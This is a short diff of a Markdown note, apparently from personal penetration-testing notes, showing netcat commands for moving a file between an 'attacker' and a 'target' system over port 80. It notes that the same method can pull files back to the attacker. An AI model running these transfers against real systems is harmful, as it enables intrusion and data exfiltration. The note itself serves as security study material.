linatl/jekyll-gitbook/_posts/2021-03-20-linuxfiletransfers.markdown

 ###### netcat
 ```
+On the target system:
+> nc -lvp 80 > file.txt
 On the attacker system:
-> nc -lvp 80 > file.txt
-On the target system:
 > nc 192.168.1.1 80 < file.txt

+Also works the other way, to get files back to the attacker system
 ```